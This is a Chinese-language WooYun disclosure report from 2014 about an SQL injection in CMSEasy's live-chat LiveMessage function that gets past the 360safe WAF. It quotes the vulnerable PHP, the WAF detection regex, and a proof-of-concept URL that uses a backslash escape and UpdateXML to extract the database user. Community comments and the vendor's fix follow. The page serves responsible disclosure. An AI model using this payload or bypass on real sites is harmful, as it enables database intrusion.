当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(46) 关注此漏洞

缺陷编号: WooYun-2014-80260

漏洞标题: cmseasy 最新版SQLl注入(第八次绕WAF)

相关厂商: cmseasy

漏洞作者: 路人甲

提交时间: 2014-10-22 11:44

公开时间: 2015-01-20 11:46

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

5人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-22: 细节已通知厂商并且等待厂商处理中
2014-10-24: 厂商已经确认,细节仅向厂商公开
2014-10-27: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-12-18: 细节向核心白帽子及相关领域专家公开
2014-12-28: 细节向普通白帽子公开
2015-01-07: 细节向实习白帽子公开
2015-01-20: 细节向公众公开

简要描述:

继续绕啊绕啊

详细说明:

cmseasy 终于更新了 看了下对比文件,那修复~~~无法吐槽~~~~





code 区域
function LiveMessage($a) {
global $db;
$sessionid = $_SESSION['sessionid'];
$name = addslashes(htmlspecialchars($a['name']));
$email = addslashes(htmlspecialchars($a['email']));
$country = htmlspecialchars($a['country']);
$phone = htmlspecialchars($a['phone']);
$departmentid = htmlspecialchars($a['departmentid']);
$message = htmlspecialchars($a['message']);
$timestamp = time();
$ip = $_SERVER['REMOTE_ADDR'];
$sql = "INSERT INTO `chat` (`sessionid`,`name`,`email`,`phone`,`departmentid`,`message`,`timestamp`,`ip`,`status`) VALUES('" . $sessionid . "','" . $name . "','" . $email . "','" . $phone . "','" . $departmentid . "','" . $message . "','" . $timestamp . "','" . $ip . "','2')";
$db->query($sql);
$sql = "DELETE FROM `sessions` WHERE `id`='" . $sessionid . "'";
$db->query($sql);
$text = "<?php echo $lang[shout_success]?>\n";
$objResponse = new xajaxResponse('utf-8');
$objResponse->addAssign('content', 'innerHTML', $text);
$objResponse->redirect('../', 5);
return $objResponse;
}



$a是可以通过前端get或者post传入。

只修复了name和email,不修复下面几个变量 这是给我们留着漏洞挖么!!!!!!!



然后开始测试,擦 发现360safe被更新了,修复增加了检测单引号! 这不坑爹么,只要输入单引号全盘否定!

code 区域
$getfilter = "\\<.+javascript:window\\[.{1}\\\\x|<.*=(&#\\d+?;?)+?>|<.*(data|src)=data:text\\/html.*>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|load_file\s*?\\()|<[a-z]+?\\b[^>]*?\\bon([a-z]{4,})\s*?=|^\\+\\/v(8|9)|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.*\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT(\\(.+\\)|\\s+?.+?|`.*?`)|UPDATE(\\(.+\\)|\\s+?.+?|`.*?`.*?)SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE)(\\(.+\\)|\\s+?.+?\\s+?|`.*?`.*?)FROM(\\(.+\\)|\\s+?.+?|`.*?`.*?)|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)|\\/\\*.*?\\*\\/|'";





但是还可以用转义符,接下来就是开始绕啊绕啊:



POC:

**.**.**.**:8080/cmseasy/celive/live/header.php?xajax=LiveMessage&xajaxargs[0][phone]=\&xajaxargs[0][departmentid]=,(UpdateXML(1,CONCAT(0x5b,user(),0x5d),1)),6,7,8)%23



另外官网没测试成功,好像有安全狗



BaiduHi_2014-10-21_16-4-7.png







漏洞证明:

BaiduHi_2014-10-21_16-4-7.png

修复方案:

全盘否定单引号 这也太坑了!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-10-24 11:03

厂商回复:

修正

最新状态:

2014-10-24:感谢提醒~~一时大意了~~


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-10-22 11:56 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    1

    绕waf哪家强?

  2. 2014-10-22 11:57 | 狗狗侠 认证白帽子 ( 普通白帽子 | Rank:518 漏洞数:58 | 我是狗狗侠)
    0

    @疯狗 山东找蓝翔

  3. 2014-10-22 12:03 | menmen519 ( 普通白帽子 | Rank:914 漏洞数:161 | http://menmen519.blog.sohu.com/)
    0

    我知道注入点 是哪里 你可真快啊 还是赞一个!!!!

  4. 2014-10-22 12:23 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)
    0

    楼主是新东方还是蓝翔毕业的啊。太淫荡了。

  5. 2014-10-22 13:16 | mramydnei ( 普通白帽子 | Rank:400 漏洞数:87 )
    0

    绕过了八次,也是醉了。。

  6. 2014-10-22 13:17 | kenan@ ( 路人 | Rank:2 漏洞数:1 | php ,asp)
    0

    绕过了8次?这

  7. 2014-10-22 13:17 | xfkxfk 认证白帽子 ( 核心白帽子 | Rank:2313 漏洞数:351 | 呵呵!)
    0

    擦,我才饶了4次,你赢了

  8. 2014-10-22 13:49 | phith0n 认证白帽子 ( 普通白帽子 | Rank:816 漏洞数:126 | 一个想当文人的黑客~)
    1

    我也醉了。。。@cmseasy 我帮你写补丁吧

  9. 2014-10-22 13:49 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安,不只保险这么简单。)
    0

    第八个工程师已被开除。

  10. 2014-10-22 14:32 | sco4x0 ( 实习白帽子 | Rank:35 漏洞数:14 | 一个渣渣)
    0

    传说中的拔进拔出,哦不对,八进八出

  11. 2014-10-24 11:08 | phith0n 认证白帽子 ( 普通白帽子 | Rank:816 漏洞数:126 | 一个想当文人的黑客~)
    0

    1,cmseasy真的生气了

  12. 2014-10-24 11:11 | pandas ( 普通白帽子 | Rank:701 漏洞数:79 | 国家一级保护动物)
    0

    1是什么情况?

  13. 2014-10-24 17:38 | mramydnei ( 普通白帽子 | Rank:400 漏洞数:87 )
    0

    @phith0n 程序员的自尊之类的东西吧,毕竟修8次都修不好暴露的不是编程功底或安全意识,而是智商。

  14. 2014-11-13 11:19 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)
    1

    居然给低

  15. 2014-11-13 11:28 | 乐乐、 ( 普通白帽子 | Rank:868 漏洞数:189 )
    1

    眼睁睁看着饶了八次 厂商也是醉了

  16. 2014-11-13 14:20 | luwikes ( 普通白帽子 | Rank:548 漏洞数:82 | 潜心学习~~~)
    1

    不忍直视

  17. 2014-12-11 20:13 | 迦南 ( 路人 | Rank:14 漏洞数:11 | 我不是玩黑,我就是认真)
    1

    @mramydnei 看透不说透。。。。

  18. 2014-12-11 20:50 | FenQing ( 路人 | Rank:8 漏洞数:3 | FenQing)
    1

    楼主该不会还想来第八第九吧

  19. 2015-01-20 15:15 | 用来怀念 ( 路人 | Rank:0 漏洞数:1 | 不是什么人都一定要去拥有,有的东西最好用...)
    1

    程序员绝壁已被开除!!!

  20. 2015-01-20 16:07 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效,坚持好的习惯千万不要放弃)
    1

    @mramydnei 说这话就有点过了

  21. 2015-01-20 16:15 | mramydnei ( 普通白帽子 | Rank:400 漏洞数:87 )
    1

    @BeenQuiver 嗯,可能有点伤人。但是我觉得会比较接近事实真相

登录后才能发表评论,请先 登录